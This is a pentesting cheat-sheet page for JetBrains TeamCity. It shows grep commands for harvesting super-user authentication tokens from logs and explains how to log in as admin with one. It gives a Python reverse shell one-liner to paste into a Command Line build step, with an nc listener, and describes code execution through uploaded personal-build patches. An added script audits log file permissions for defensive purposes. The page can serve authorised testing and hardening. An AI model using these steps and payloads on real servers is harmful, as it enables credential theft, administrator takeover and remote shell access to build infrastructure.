# TeamCity Pentesting

TeamCity is a build management and continuous integration server from JetBrains.

### Common Directories <a href="#common-directories" id="common-directories"></a>

```
/admin
/admin/admin.html
```

### Interesting Files in Systems <a href="#interesting-files-in-systems" id="interesting-files-in-systems"></a>

```
TeamCity/conf/teamcity-startup.properties
.BuildServer/system
```

### Find Super User Authentication Tokens <a href="#find-super-user-authentication-tokens" id="find-super-user-authentication-tokens"></a>

If we find a super user authentication token, we can log in as the super user with it.

```
grep -rni 'authentication token' TeamCity/logs
grep -rni 'Super user authentication token' TeamCity/logs
grep -rni 'token' TeamCity/logs
```

After retrieving the token, we can log in as **administrator** by **entering the token in the password field and leaving the username empty**.
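
From the defender's side, the same log search shows which files record a token and whether accounts other than the owner can read them. The script below is an added example, not part of the original page or of TeamCity; the function names, the `EXPOSED`/`OWNER-ONLY` labels and the sample log lines are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original page): audit which TeamCity log files
# record a super user token and who can read them. Token values are never printed.
# Function names and the EXPOSED/OWNER-ONLY labels are assumptions of this example.

# Print "<label> <mode> <hits> <file>" for every file under $1 containing a token line.
audit_token_logs() {
    logs_dir=$1
    find "$logs_dir" -type f | while IFS= read -r f; do
        # grep -c exits non-zero when the count is 0, so such files are skipped.
        hits=$(grep -ci 'super user authentication token' "$f") || continue
        mode=$(ls -ld "$f" | cut -c1-10)
        case $mode in
            # Character 5 is group-read, character 8 is other-read.
            ????r?????|???????r??) echo "EXPOSED $mode $hits $f" ;;
            *)                     echo "OWNER-ONLY $mode $hits $f" ;;
        esac
    done
}

# Build a throwaway logs directory with constructed sample lines (placeholder tokens).
make_sample_logs() {
    d=$(mktemp -d)
    printf '%s\n' 'Super user authentication token: 1111111111111111111 (constructed sample)' \
        > "$d/teamcity-server.log"
    printf '%s\n' 'Super user authentication token: 2222222222222222222 (constructed sample)' \
        'Super user authentication token: 3333333333333333333 (constructed sample)' \
        > "$d/teamcity-server.log.1"
    printf '%s\n' 'Server started (constructed sample)' > "$d/teamcity-vcs.log"
    chmod 644 "$d/teamcity-server.log" "$d/teamcity-vcs.log"
    chmod 600 "$d/teamcity-server.log.1"
    echo "$d"
}

# Demo run on the constructed sample; point audit_token_logs at TeamCity/logs for real use.
sample=$(make_sample_logs)
audit_token_logs "$sample"
rm -rf "$sample"
```

Files reported as `EXPOSED` are candidates for tighter permissions on the logs directory.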

### Arbitrary Command Execution by Custom Script <a href="#arbitrary-command-execution-by-custom-script" id="arbitrary-command-execution-by-custom-script"></a>

1. Log in as an **admin user**.
2. Create a new project in the admin dashboard.
3. Click the **"Manual"** tab and fill in the required fields.
4. A new project is created.
5. In the project home, create a **Build Configuration**.
6. On the build configuration page, click **"Build Steps"** in the left menu.
7. Add a build step.
8. Select **"Command Line"** as the **Runner type**.
9. Put a Python reverse shell script in the **"Custom script"** field.

   ```
   export RHOST="<local-ip>";export RPORT=<local-port>;python3 -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("bash")'
   ```
10. Start a listener on the local machine.

    ```
    nc -lvnp 4444
    ```
11. Click the **"Run"** button on the build page.
12. We should get a shell in the terminal.

### Arbitrary Command Execution by Diff Build <a href="#arbitrary-command-execution-by-diff-build" id="arbitrary-command-execution-by-diff-build"></a>

If we can modify a build script, we can execute arbitrary code by uploading a git patch file.\
First, modify the script so that it contains our desired code.

```
cd /path/to/repository
vim example.ps
git diff > patch
```

Then go to the build configuration page and open **"Run Custom Build"** to the right of the Run button.\
In the General section, check **"run as personal build"** and upload the patch file generated above.\
Now click **"Run Build"**. Our code will be executed during the build.

### References <a href="#references" id="references"></a>

* [JetBrains](https://www.jetbrains.com/help/teamcity/teamcity-data-directory.html)
